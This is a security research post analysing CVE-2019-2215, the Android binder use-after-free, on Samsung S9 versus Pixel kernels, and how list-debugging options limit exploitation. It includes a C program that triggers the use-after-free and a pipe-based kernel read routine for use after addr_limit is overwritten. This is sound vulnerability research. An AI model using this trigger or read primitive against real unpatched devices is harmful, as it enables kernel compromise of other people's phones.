When the initial technical advisory for CVE-2019-2215 came out last year, the Samsung S9 was listed as a vulnerable device. The use-after-free is indeed present in the Samsung kernels on unpatched S9 devices and can be triggered using the original reproducer discovered by syzkaller/syzbot. However, the exploitation primitive obtained is different from the one on the Pixel 2 device demonstrated in the original advisory. This post describes the differences between the AOSP/Pixel and S9 kernels.
If you're not familiar with the vulnerability, refer to the P0 blog post for the details. In short, the vulnerable object struct binder_thread gets freed and then accessed (use-after-free) in remove_wait_queue(). The full UAF path is ep_eventpoll_release → ep_free → ep_unregister_pollwait → ep_remove_wait_queue → remove_wait_queue.
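For reference, the trigger itself is only a handful of syscalls: register the binder fd with an epoll instance, free the binder_thread via the BINDER_THREAD_EXIT ioctl, then close the epoll fd so that ep_free() walks the now-stale wait queue. A minimal sketch along the lines of the public reproducer is shown below (device path and ioctl number assumed to match the standard binder driver; error handling omitted, and this only triggers the UAF, it is not an exploit):

#include <fcntl.h>
#include <sys/epoll.h>
#include <sys/ioctl.h>
#include <unistd.h>

#define BINDER_THREAD_EXIT 0x40046208ul   /* _IOW('b', 8, __s32) */

int main(void)
{
	int binder_fd = open("/dev/binder", O_RDONLY);
	int epfd = epoll_create(1);
	struct epoll_event ev = { .events = EPOLLIN };

	/* Link an eppoll_entry into the binder_thread's wait queue. */
	epoll_ctl(epfd, EPOLL_CTL_ADD, binder_fd, &ev);

	/* Free the binder_thread while the epoll entry still references it. */
	ioctl(binder_fd, BINDER_THREAD_EXIT, 0);

	/* ep_free() -> ... -> remove_wait_queue() now touches freed memory. */
	close(epfd);
	return 0;
}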
void remove_wait_queue(wait_queue_head_t *q, wait_queue_t *wait)
{
	...
	spin_lock_irqsave(&q->lock, flags);       [1]
	__remove_wait_queue(q, wait);             [2]
	spin_unlock_irqrestore(&q->lock, flags);  [3]
}
The first use-after-free access happens when the spinlock is locked in [1]. For those not familiar with the Linux spinlock implementation (an arm64 ticket spinlock on these devices), the lock structure is shown below:
(gdb) ptype arch_spinlock_t
type = struct {
    u16 owner;
    u16 next;
}
If owner and next are equal, the lock can be acquired by the execution path. The previously described exploitation technique sets the lock value to 0 (unlocked state). If the object that refills the freed allocation holds a value representing a locked spinlock at the lock offset (0x68 within struct binder_thread on Samsung kernels), the execution path above will deadlock. However, the spinlock value can be any 32-bit integer as long as the owner and next members are equal, e.g., 0x10001, 0x20002, etc., all of which represent an unlocked state.
In [3] the unlocking procedure increments owner by 1, while acquiring the lock in [1] has already incremented next by 1 when taking a ticket. For example, if the original lock value was 0 (before acquiring the lock), after [3] it becomes 0x10001. By themselves, the code paths in [1] and [3] represent a very weak exploitation primitive.
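For clarity, here is a simplified model of those ticket-lock semantics (this is not the actual arm64 implementation, which uses atomic ldaxr/stxr sequences, but it captures the behaviour relevant here):

#include <stdint.h>

/* Simplified model of a ticket spinlock: owner/next as in arch_spinlock_t. */
struct ticket_lock {
	uint16_t owner;   /* ticket currently being served */
	uint16_t next;    /* next ticket to hand out */
};

static void ticket_lock(struct ticket_lock *l)
{
	uint16_t ticket = l->next++;   /* [1] take a ticket */
	while (l->owner != ticket)     /* spins forever if the value looks "locked" */
		;
}

static void ticket_unlock(struct ticket_lock *l)
{
	l->owner++;                    /* [3] serve the next ticket */
}

/* Viewed as a little-endian 32-bit value: 0 becomes 0x10000 after
 * ticket_lock() and 0x10001 after ticket_unlock(), matching the example above. */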
What really makes this vulnerability exploitable is the code path in [2]. The UAF access on this path overwrites a couple of members of the freed struct binder_thread object with a "self-referencing" pointer when manipulating the linked list. __remove_wait_queue() simply performs a list_del on the task_list member of the freed struct binder_thread:
static inline void
__remove_wait_queue(wait_queue_head_t *head, wait_queue_t *old)
{
	list_del(&old->task_list);
}
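It is worth spelling out where the "self-referencing" pointer comes from: the wait queue head is embedded in the freed binder_thread itself, so when the epoll entry is its only waiter, both neighbours of old->task_list point back at the freed object. The plain (non-debug) __list_del() helper that ultimately performs the unlink (shown below slightly simplified; upstream uses WRITE_ONCE for the second store) therefore writes the address of the freed wait queue head back into the freed object:

static inline void __list_del(struct list_head *prev, struct list_head *next)
{
	/* With a single waiter, prev == next == &freed_thread->wait.task_list,
	 * so both stores write a pointer into the freed binder_thread that
	 * points at the freed binder_thread itself. */
	next->prev = prev;
	prev->next = next;
}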
The iovec refill is then used to leak the address of the current process's task_struct and to overwrite its addr_limit, which yields arbitrary kernel read/write.
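One common way to turn an overwritten addr_limit into stable primitives is to bounce data through a pipe, since copy_from_user()/copy_to_user() stop rejecting kernel addresses once the limit is raised. A minimal sketch, assuming addr_limit has already been overwritten and kpipe is an open pipe (names are illustrative, error handling omitted):

#include <unistd.h>

static int kpipe[2];   /* created earlier with pipe(kpipe) */

/* Read len bytes from kernel address kaddr into the user buffer buf:
 * write() copies out of the kernel address, read() returns it to userland. */
static void kernel_read(unsigned long kaddr, void *buf, size_t len)
{
	write(kpipe[1], (const void *)kaddr, len);
	read(kpipe[0], buf, len);
}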
If the CONFIG_DEBUG_LIST kernel configuration option is enabled, this vulnerability should become unexploitable: the additional linked-list checks are expected to turn the corruption into a kernel panic. To be specific, the list_del implementation in the 4.9 Samsung kernel (which has CONFIG_DEBUG_LIST enabled by default) is shown below.
static inline void list_del(struct list_head *entry)
{
	__list_del_entry(entry);
	entry->next = LIST_POISON1;
	entry->prev = LIST_POISON2;
}
void __list_del_entry(struct list_head *entry)
{
	struct list_head *prev, *next;

	prev = entry->prev;
	next = entry->next;

	if (WARN(next == LIST_POISON1,
		"list_del corruption, %p->next is LIST_POISON1 (%p)\n",
		entry, LIST_POISON1) ||
	    WARN(prev == LIST_POISON2,
		"list_del corruption, %p->prev is LIST_POISON2 (%p)\n",
		entry, LIST_POISON2) ||
	    WARN(prev->next != entry,
		"list_del corruption. prev->next should be %p, "
		"but was %p\n", entry, prev->next) ||
	    WARN(next->prev != entry,
		"list_del corruption. next->prev should be %p, "
		"but was %p\n", entry, next->prev)) {
		list_bug();                        [4]
		return;
	}

	__list_del(prev, next);                    [5]
}
The UAF write with the self-referencing pointer happens in [5]. However, as can be seen above, several list safety checks lead to list_bug() in [4] if list corruption is detected. We would expect list_bug() to trigger BUG(), but here's what Samsung did instead:
static inline void list_bug(void)
{
#ifdef CONFIG_DEBUG_LIST_PANIC
	BUG_ON(1);
#endif
}
CONFIG_DEBUG_LIST_PANIC is NOT enabled by default in S9 kernels. As a result, detected list corruption produces only a kernel warning followed by an immediate return after [4], and [5] is never reached.
What we end up with is a much weaker exploitation primitive - locking and unlocking the wait queue spinlock in [1] and [3]. The previously described exploitation technique relied on __remove_wait_queue() triggering the UAF write with a self-referencing pointer. On S9 we can only increment the two 16-bit halves of the spinlock value by 1.
AOSP kernels are slightly different. The list_del implementation (when CONFIG_DEBUG_LIST is enabled) is shown below.
static inline void list_del(struct list_head *entry)
{
	__list_del_entry(entry);
	entry->next = LIST_POISON1;
	entry->prev = LIST_POISON2;
}

static inline void __list_del_entry(struct list_head *entry)
{
	if (!__list_del_entry_valid(entry))        [6]
		return;

	__list_del(entry->prev, entry->next);
}
__list_del_entry_valid() in [6] uses the CHECK_DATA_CORRUPTION macro to validate list entries. If the CONFIG_BUG_ON_DATA_CORRUPTION config option is enabled, BUG() is triggered, resulting in a kernel panic. Otherwise only a warning is produced, similar to the Samsung kernels.
bool __list_del_entry_valid(struct list_head *entry)
{
	struct list_head *prev, *next;

	prev = entry->prev;
	next = entry->next;

	if (CHECK_DATA_CORRUPTION(next == LIST_POISON1,
			"list_del corruption, %p->next is LIST_POISON1 (%p)\n",
			entry, LIST_POISON1) ||
	    CHECK_DATA_CORRUPTION(prev == LIST_POISON2,
			"list_del corruption, %p->prev is LIST_POISON2 (%p)\n",
			entry, LIST_POISON2) ||
	    CHECK_DATA_CORRUPTION(prev->next != entry,
			"list_del corruption. prev->next should be %p, but was %p\n",
			entry, prev->next) ||
	    CHECK_DATA_CORRUPTION(next->prev != entry,
			"list_del corruption. next->prev should be %p, but was %p\n",
			entry, next->prev))
		return false;

	return true;
}
#define CHECK_DATA_CORRUPTION(condition, fmt, ...)                       \
	check_data_corruption(({                                         \
		bool corruption = unlikely(condition);                   \
		if (corruption) {                                        \
			if (IS_ENABLED(CONFIG_BUG_ON_DATA_CORRUPTION)) { \
				pr_err(fmt, ##__VA_ARGS__);              \
				BUG();                                   \
			} else                                           \
				WARN(1, fmt, ##__VA_ARGS__);             \
		}                                                        \
		corruption;                                              \
	}))
However, Pixel 3/XL devices (even though they're not affected by CVE-2019-2215) have neither CONFIG_DEBUG_LIST nor CONFIG_BUG_ON_DATA_CORRUPTION enabled by default, making list/hlist corruption vulnerabilities more easily exploitable on Google devices.
Samsung S9 kernels have CONFIG_DEBUG_LIST enabled by default, but CONFIG_DEBUG_LIST_PANIC is disabled. In theory this still leaves the device vulnerable to CVE-2019-2215, but it results in a much weaker exploitation primitive - incrementing the two 16-bit halves of a 32-bit value by 1, where the original value being incremented must look like an unlocked spinlock.
The situation is similar on AOSP kernels, where CONFIG_BUG_ON_DATA_CORRUPTION needs to be enabled in combination with CONFIG_DEBUG_LIST for the mitigation to be effective against vulnerabilities leading to linked list / hash table corruption.
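For completeness, the defconfig fragment that makes these checks fatal would look like this (both options are referenced above; whether the second one is available depends on the kernel branch):

CONFIG_DEBUG_LIST=y
CONFIG_BUG_ON_DATA_CORRUPTION=y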